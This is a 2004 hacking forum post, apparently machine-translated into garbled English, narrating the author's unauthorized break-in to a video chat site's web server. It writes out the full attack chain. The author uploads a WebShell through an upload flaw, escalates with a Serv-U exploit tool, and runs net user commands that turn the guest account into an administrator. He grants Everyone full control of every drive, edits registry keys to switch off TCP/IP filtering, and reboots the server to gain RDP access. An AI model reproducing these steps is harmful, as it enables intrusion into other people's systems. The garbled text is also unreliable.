Author: lvhuana from: http: //www.wrsky.com/
Date: 2004.12.11lvhuana 1: Get a small test of WebShell this evening, because I am too nick, I will not, I can only have this ......... I have passed There is no way to make up, I hope to understand this little post. Today is a boring day, I am not bored at night, I have to go to a video chat site, I suddenly discovered a special fire violence of a chat room, the number of 500 people have been inside (full staff), brush N I didn't go in .......... More depressed! :( Think about it is nothing to do, test how the host is safe to do, huh, huh (too dish, saying that people safety is really raising yourself) Ping under CMD, then got the other party IP, then landed http://whois.Webhosting.info/ The other ip Take a look at the other sites, ha, this time, there are dozens of sites, it is estimated that I can still find a two-vulnerable site. Find, finally found a pages of a driving band vulnerability _Soft.asp "> http://www.xxx.net/upfile_soft.asp, upload a WebShell (Haoyang 2005 official version) first (how to upload me is not Luo Wei Uploading tools are now drifting).
Second: Successfully improved rights to establish users to get the WebShell, high-intensity, and suddenly found that there is no permission, can only be switched in the directory of our own Webshell (CDEF disk can't be browsed), and even delete files No. ^ Scan his IP with SuperScan, and then see the serv-u, version 5.0 he used through Banner. To 〖wscript.shell, let's try to execute the CMD command. You can't, if you enter the net user, you don't have it, then you can perform the CMD command through wscript.shell, and then enter the NET USER. Return each other's User list, haha, this It's good, I can get it! ! Upload SERV-U lifting tool to D: / A004 / TGGTWE / ****. COM / UPLOADSOFT directory below, rename: test.exe, then return to 〖wscript.shell to execute commands, 嘿嘿, immediately Only fat chicken is going to hand, please ING ~ Erhaw command with WScript.Shell: d: / a004 / tggtwe / ****. Com / uploadsoft / test.exe "Net user guest / activ: YES" # Activation Guest Account, I like to use this account D: / A004 / TGGTWE / ****. Com / uploadsoft / test.exe "net user guest lvhuana" # Set the password of the guest account to lvhuanad: / a004 / tggtwe / ** **. com / uploadsoft / test.exe "Net localgroup administrators guest / add" # enhances guest rights to Admin rights, the account is established, perform NET localgroup administrators to see success, by echoing knowing the addition of success. Then when you perform NetStat -N, you see the terminal port of his open is the default 3389, OK, the connection is trying to try ~
Three: Solve the TCP / IP filter connection! ? Halo ........... I took out Superscan to sweep his 3389, couldn't sweep at all ...... (opened firewall!? Rely, my little back .. ...) There is no way, return to WScript.shell again to perform CMD command: d: / a004 / tggtwe / ****. Com / uploadsoft / test.exe "Cacls.exe C: / E / T / g Everyone : F "# Set the C disk to Everyone can browse D: / a004 / tggtwe / ****. Com / uploadsoft / test.exe" Cacls.exe D: / E / T / G Everyone: f "# put D The disc is set to Everyone can browse D: / A004 / TGGTWE / ****. Com / uploadsoft / test.exe "Cacls.exe E: / E / E:" Set the E disk to Everyone can be viewed D: / A004 / TGGTWE / ****. Com / uploadsoft / test.exe "Cacls.exe f: / e / t / g everyone: f" # Set the F disk to everyone can browse this minimum can be traversed throughout Hard drive, I have turned around in the hard disk, I haven't found his firewall file, there is a number in my heart, and it is definitely he for TCP / IP screening! (Of course, there is also the possibility of doing the server in the internal network. If you can determine from ipconfig -all) breakthrough TCP / IP filtering we can change his registry to achieve, what we have to do is to export three of his registry, After the changes are imported, return to 〖wscript.shell to perform the cmd command: D: / a004 / tggtwe / ****. Com / uploadsoft / test.exe "regedit-E d: / A004 / TggTWE / * ***. com / uploadsoft / 1.REG HKEY_LOCAL_MACHINE / SYSTEM / Controlset001 / Services / TCPIP "# 导出: 册 表 关于 表 关于 表 第一 表 第一 表 第一 表 第一 表 第一: 第一: d / Test.exe "regedit-E d: / a004 / tggtwe / ****. com / uploadsoft / 2.reg hkey_local_machine / system / controlset002 / service / tcpip" 导 导 导 册 表 表 表 表 表 表 表 表D: / A004 / TGGTWE / ****. Com / uploadsoft / test.exe "regedit -e d: / a004 / tggtwe / ****. Com / uploadsoft / 3.reg hkey_local_machine / system / currentControlset / Services / TCPIP "# Export the third place about TCP / IP filtering in the registration table and then return to 〖stream〗 or 〖FSO〗 Discovery 1.reg, 2.reg, 3.Reg is quiet lying there, 嘿嘿 ~ 1. REG, 2.REG, 3.REG Download Back to your hard drive, change the TCP / IP screening, first open 1.Reg to find "EnableSecurityFilters" = DWORD: 00000001 Put the back Number 1 is changed to 0, then change 2.Reg, 3.REG,
Like the method, I will no longer be more than a long time ~ then we will return 1.reg, 2.reg, 3.REG back to the other party's machine (here we want to select override mode, because there is no permission to delete the original 1. REG, 2.REG, 3.REG, then return to 〖wscript.shell after the upload is successful, execute the cmd command: D: / a004 / tggtwe / ****. com / uploadsoft / test.exe "regedit -s D : / A004 / TGGTWE / ****. COM / UPLOADSOFT / 1.REG "# # 静 模式 模式 模式 模式 模式 模式: 表 表 表 表 表 表 表 表 表 表 表 模式: 表:: 模式 表 表/Uploadsoft/test.exe "regedit -s d: / A004 / TggtWe / ****. Com / uploadsoft / 2.REG" #Vely modified 2.REG imported to his registry D: /A004/tggtwe/****.com/uploadsoft/test.exe "regedit -s d: / a004 / tggtwe / ****. com / uploadsoft / 3.REG" # 安 静 模式 模式 修 模式3.Reg Import to his registry OK! After importing his machine, then you can solve the TCP / IP filtering problem, then execute the CMD command at WScript.Shell: D: / A004 / TggTWe / ****. COM / UPLOADSOFT / TEST.EXE "IisReset / Reboot / timeout: 00 "# Using his own IIS service to restart his machine, / timeout: 00 This parameter is letting him immediately restart, we will use SuperScan to sweep him again, ~ already Restart! Four: Successfully used the terminal to log in after a long waiting (in fact, the time is not long, just I can't wait here, 嘿嘿 ~), can finally sweep him with SuperScan, and can sweep away to his 3389 port, haha I finally succeeded, take out the terminal lander to use the User: Guest, Pass: lvhuana that I just created! Ok, this garbage article will be over, it has been over, and it's also the collection ~ because I am too nick, the wrong place is definitely inevitable, let everyone laugh, and I hope everyone is correct! (If there is a reprint, please bring the author information, it is not easy to write, so long ...........)
